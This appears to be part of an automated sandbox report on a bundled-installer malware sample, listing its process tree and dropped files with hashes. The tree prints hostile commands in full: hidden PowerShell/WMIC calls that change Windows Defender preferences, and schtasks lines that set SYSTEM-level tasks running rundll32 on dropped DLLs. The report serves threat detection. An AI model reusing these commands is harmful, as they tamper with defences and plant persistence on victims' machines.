                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                          2⤵
                                                                                                                                            PID:5768
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                              3⤵
                                                                                                                                                PID:2380
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5200
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                      5⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:5144
                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                        6⤵
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:3012
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\sEGvbu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
                                                                                                                                                2⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:2328
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\epowzXZ.xml" /RU "SYSTEM"
                                                                                                                                                2⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:6088
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /END /TN "OcPshDNvhDnVmSv"
                                                                                                                                                2⤵
                                                                                                                                                  PID:5192
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5420
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\BeqXEUx.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5484
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\HyjwEhT.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5064
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PgPwesd.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4032
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\KeeYAat.xml" /RU "SYSTEM"
                                                                                                                                                    2⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:2904
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:04:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\fEWQCdtm\nPEEtpq.dll\",#1 /ftrGdidUG 757674" /V1 /F
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4940
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "MRTHivZIQsRdEanwm"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4336
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5620
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 1796
                                                                                                                                                        2⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:1988
                                                                                                                                                    • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\fEWQCdtm\nPEEtpq.dll",#1 /ftrGdidUG 757674
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5476
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\fEWQCdtm\nPEEtpq.dll",#1 /ftrGdidUG 757674
                                                                                                                                                          2⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:5308
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5936

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

                                                                                                                                                          Filesize

                                                                                                                                                          789KB

                                                                                                                                                          MD5

                                                                                                                                                          bb2d3d4ad93ad12abc3d171339ccac67

                                                                                                                                                          SHA1

                                                                                                                                                          68864e66643815e6d266c5d4cc25a6631f720fcb

                                                                                                                                                          SHA256

                                                                                                                                                          50d24e5ceb1964e07478ea5940f9cd26fab22a9a7fd6c1a1cf8bf1b90d8f30e0

                                                                                                                                                          SHA512

                                                                                                                                                          975195459db5bc1e94f2d8a4b6d5dadd79b5ca361b876e7a893c9b8c4eef76ea689757b3bc41a22bfb38e6e333536017f8df43b89fd8579a1661da8591d5be8c

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                          MD5

                                                                                                                                                          1bfe591a4fe3d91b03cdf26eaacd8f89

                                                                                                                                                          SHA1

                                                                                                                                                          719c37c320f518ac168c86723724891950911cea

                                                                                                                                                          SHA256

                                                                                                                                                          9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

                                                                                                                                                          SHA512

                                                                                                                                                          02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

                                                                                                                                                        • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe

                                                                                                                                                          Filesize

                                                                                                                                                          5.0MB

                                                                                                                                                          MD5

                                                                                                                                                          4351fed433c00446d4e99c0c8d441d69

                                                                                                                                                          SHA1

                                                                                                                                                          f68ec05d2b210dc5e959863f184245e795003919

                                                                                                                                                          SHA256

                                                                                                                                                          79b31752f002a877efe019b622edbf630aa668e0d6d7b7208b071ecaf9da7265

                                                                                                                                                          SHA512

                                                                                                                                                          5592c25d203a76cd6f82ff82de546816077881d6e2cfe0095e2bf186210eddacb8598b26b5a003b09a5bbafab2334009fdf1cec55bac49d9878d8bacd1f0da06

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe

                                                                                                                                                          Filesize

                                                                                                                                                          4.6MB

                                                                                                                                                          MD5

                                                                                                                                                          237ecd4700cbe4067a075be7ea017d93

                                                                                                                                                          SHA1

                                                                                                                                                          f1d44a1597ace09859d74c027cdef665d7209e68

                                                                                                                                                          SHA256

                                                                                                                                                          f4e0993a49b614bfb2cdace65421e2c2f7ff1be8e561a6ee4d39be9102402563

                                                                                                                                                          SHA512

                                                                                                                                                          6ecd087279b65d892d978b10daa56ad97a090a403189dda15183a155ce89d89bee6a68f9e92ab88444a152371bed2135ba729e712ea9e5947be3c4d2d26c8423

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json

                                                                                                                                                          Filesize

                                                                                                                                                          150B

                                                                                                                                                          MD5

                                                                                                                                                          33292c7c04ba45e9630bb3d6c5cabf74

                                                                                                                                                          SHA1

                                                                                                                                                          3482eb8038f429ad76340d3b0d6eea6db74e31bd

                                                                                                                                                          SHA256

                                                                                                                                                          9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

                                                                                                                                                          SHA512

                                                                                                                                                          2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json

                                                                                                                                                          Filesize

                                                                                                                                                          161B

                                                                                                                                                          MD5

                                                                                                                                                          5c5a1426ff0c1128c1c6b8bc20ca29ac

                                                                                                                                                          SHA1

                                                                                                                                                          0e3540b647b488225c9967ff97afc66319102ccd

                                                                                                                                                          SHA256

                                                                                                                                                          5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

                                                                                                                                                          SHA512

                                                                                                                                                          1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                          Filesize

                                                                                                                                                          10KB

                                                                                                                                                          MD5

                                                                                                                                                          3a906eaba65c21f13e434d735da09c31

                                                                                                                                                          SHA1

                                                                                                                                                          aeac20738a9a1ee64cc436513e7138a33489425e

                                                                                                                                                          SHA256

                                                                                                                                                          ed2d9658ddd633cb9aa066496aa2d186d37a8adb3a5c4d67f7e9a846f1949873

                                                                                                                                                          SHA512

                                                                                                                                                          78af0aed2bc80a2f4484206bc66d740866bb4a6267f14465273428d7d37bbe304d792f11da75f89120cde24c4a14c01eadbd1c63b93354bf520672254877eef4

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                          Filesize

                                                                                                                                                          26KB

                                                                                                                                                          MD5

                                                                                                                                                          d087cc44c8d3131fbd945c7e8e5b967e

                                                                                                                                                          SHA1

                                                                                                                                                          aab3cf47d8176fc354366bc66796331652de12b9

                                                                                                                                                          SHA256

                                                                                                                                                          75f322d35d20d1c2301db9cd78ea6a0fce26a399fdf7aece4340448f4b9ba929

                                                                                                                                                          SHA512

                                                                                                                                                          ee6e7efa984e592bdcbfbd1ce945a30f38f6a9b067ac5736c1ab006e60efa3b2b8e50149808c4120c94fb6908e0fe0697215769fdad39fe8a39b269f790a6a03

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                          MD5

                                                                                                                                                          66382a4ca6c4dcf75ce41417d44be93e

                                                                                                                                                          SHA1

                                                                                                                                                          8132cbef1c12f8a89a68a6153ade4286bf130812

                                                                                                                                                          SHA256

                                                                                                                                                          a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

                                                                                                                                                          SHA512

                                                                                                                                                          2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZVQ9VIUB\edgecompatviewlist[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          74KB

                                                                                                                                                          MD5

                                                                                                                                                          d4fc49dc14f63895d997fa4940f24378

                                                                                                                                                          SHA1

                                                                                                                                                          3efb1437a7c5e46034147cbbc8db017c69d02c31

                                                                                                                                                          SHA256

                                                                                                                                                          853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

                                                                                                                                                          SHA512

                                                                                                                                                          cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          16KB

                                                                                                                                                          MD5

                                                                                                                                                          6e8dd2df6de50ce5dc1e780b38daa159

                                                                                                                                                          SHA1

                                                                                                                                                          0f8e500e2e31b4f360081c834142639ad695bf90

                                                                                                                                                          SHA256

                                                                                                                                                          c632213af2b9aba01871a2e74ed1b71e9f0cffccdcb42e559e3df5f0a5d25eaf

                                                                                                                                                          SHA512

                                                                                                                                                          c00df952cdb935a8779d2fcfdefbf2a379bc3f12e9574c9cb28b9ab9295e1693de2d4152ca2394e00f17582416e1be2d0738c82c3fd3321e680302b0e9cb1b46

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          16KB

                                                                                                                                                          MD5

                                                                                                                                                          a3b701983e796475797885721ac93695

                                                                                                                                                          SHA1

                                                                                                                                                          d31046d60326d3eca59a9631cb197c66f58b3542

                                                                                                                                                          SHA256

                                                                                                                                                          ebf02f31fcb8dca732ed935f64f9f51c3b1fd9bc270f033a5bedbc0d6b486f31

                                                                                                                                                          SHA512

                                                                                                                                                          c8374c8dc699aca103d8b66d56db1815c303e35884a975f8a87e01f2faa45702351ed397a372e377973fab3854e6912be8c84c11201dc4c9d511f733f1af1b6f

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          16KB

                                                                                                                                                          MD5

                                                                                                                                                          01243e4dff6b7a7946a1343b881917d4

                                                                                                                                                          SHA1

                                                                                                                                                          c5b256ff891c7788fbb3cf31ca206d5dff3d54e8

                                                                                                                                                          SHA256

                                                                                                                                                          5ea379d381ab5304c7266d03713c29840151151c4ed2bf5b6bedd0b49b807e58

                                                                                                                                                          SHA512

                                                                                                                                                          255636c113b0fea47cc30d7b8fa8a4b96a7772800b370d3ffbe9afe9f1d3bba712035a7f6a2aad3853634745365475502cd40bc3c2033eaea7fb370ea83fc24b

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\NR2H02H5\recaptcha__en[1].js

                                                                                                                                                          Filesize

                                                                                                                                                          533KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\WL0YQ9UD\7ggH1mMGEukBBwoLB3EX4ZHW7ZyTei_QLMtxr-2MQIA[1].js

                                                                                                                                                          Filesize

                                                                                                                                                          17KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\WL0YQ9UD\api[1].js

                                                                                                                                                          Filesize

                                                                                                                                                          870B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\XI0RVBN7\bootstrap-icons.min[1].css

                                                                                                                                                          Filesize

                                                                                                                                                          68KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\XI0RVBN7\bootstrap.min[1].css

                                                                                                                                                          Filesize

                                                                                                                                                          188KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\XI0RVBN7\webworker[1].js

                                                                                                                                                          Filesize

                                                                                                                                                          102B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\YPT9ZP1P\styles__ltr[1].css

                                                                                                                                                          Filesize

                                                                                                                                                          55KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\4SRT3UGD\ify[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          356B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\4SRT3UGD\ify[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\4SRT3UGD\ify[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\C1BX0FYV\clck[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          13B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\C1BX0FYV\clck[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          352B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\C1BX0FYV\clck[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\C1BX0FYV\clck[1].xml

                                                                                                                                                          Filesize

                                                                                                                                                          624B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\RPVGOA6E\favicon[1].htm

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\RPVGOA6E\favicon[1].ico

                                                                                                                                                          Filesize

                                                                                                                                                          14KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\SZWNFRYG\suggestions[1].en-US

                                                                                                                                                          Filesize

                                                                                                                                                          17KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\NR2H02H5\setup_bQFFnFHGSf[1].zip

                                                                                                                                                          Filesize

                                                                                                                                                          6.1MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\WL0YQ9UD\tag[1].js

                                                                                                                                                          Filesize

                                                                                                                                                          200KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\YPT9ZP1P\advert[1].gif

                                                                                                                                                          Filesize

                                                                                                                                                          43B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

                                                                                                                                                          Filesize

                                                                                                                                                          854B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\66F835E41EC6A985EB9271E4A70169D7_CF44E3C99F7F4AC558EEB35244F7E046

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\81B9B36F9ABC4DA631A4713EE66FAEC6_5ABD7D01BC4734045B6B5D27402C000C

                                                                                                                                                          Filesize

                                                                                                                                                          940B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_857450206B889F4FEA0F888FA03D68DB

                                                                                                                                                          Filesize

                                                                                                                                                          471B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

                                                                                                                                                          Filesize

                                                                                                                                                          170B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\66F835E41EC6A985EB9271E4A70169D7_CF44E3C99F7F4AC558EEB35244F7E046

                                                                                                                                                          Filesize

                                                                                                                                                          502B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\81B9B36F9ABC4DA631A4713EE66FAEC6_5ABD7D01BC4734045B6B5D27402C000C

                                                                                                                                                          Filesize

                                                                                                                                                          520B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_857450206B889F4FEA0F888FA03D68DB

                                                                                                                                                          Filesize

                                                                                                                                                          402B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\additional_file0.tmp

                                                                                                                                                          Filesize

                                                                                                                                                          2.6MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe

                                                                                                                                                          Filesize

                                                                                                                                                          1.9MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\dbgcore.DLL

                                                                                                                                                          Filesize

                                                                                                                                                          166KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\dbghelp.dll

                                                                                                                                                          Filesize

                                                                                                                                                          1.7MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe

                                                                                                                                                          Filesize

                                                                                                                                                          298KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe

                                                                                                                                                          Filesize

                                                                                                                                                          5.2MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.7MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe

                                                                                                                                                          Filesize

                                                                                                                                                          4.4MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3zubp1f.zgw.ps1

                                                                                                                                                          Filesize

                                                                                                                                                          1B

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe

                                                                                                                                                          Filesize

                                                                                                                                                          2.0MB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp

                                                                                                                                                          Filesize

                                                                                                                                                          694KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp

                                                                                                                                                          Filesize

                                                                                                                                                          680KB

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-P2KM7.tmp\_isetup\_shfoldr.dll

                                                                                                                                                          Filesize

                                                                                                                                                          22KB

                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js

                                                                                                                                                          Filesize

                                                                                                                                                          7KB

                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

                                                                                                                                                          Filesize

                                                                                                                                                          40B

                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\Opera_installer_2407160514593471456.dll

                                                                                                                                                          Filesize

                                                                                                                                                          4.7MB

                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\is-4PB3J.tmp\_isetup\_iscrypt.dll

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\nsl1D3.tmp\INetC.dll

                                                                                                                                                          Filesize

                                                                                                                                                          21KB

  • \Users\Admin\AppData\Local\Temp\nsl1D3.tmp\blowfish.dll

    Filesize: 22KB


  • \Users\Admin\AppData\Local\Temp\nsl1D3.tmp\nsProcess.dll

    Filesize: 4KB

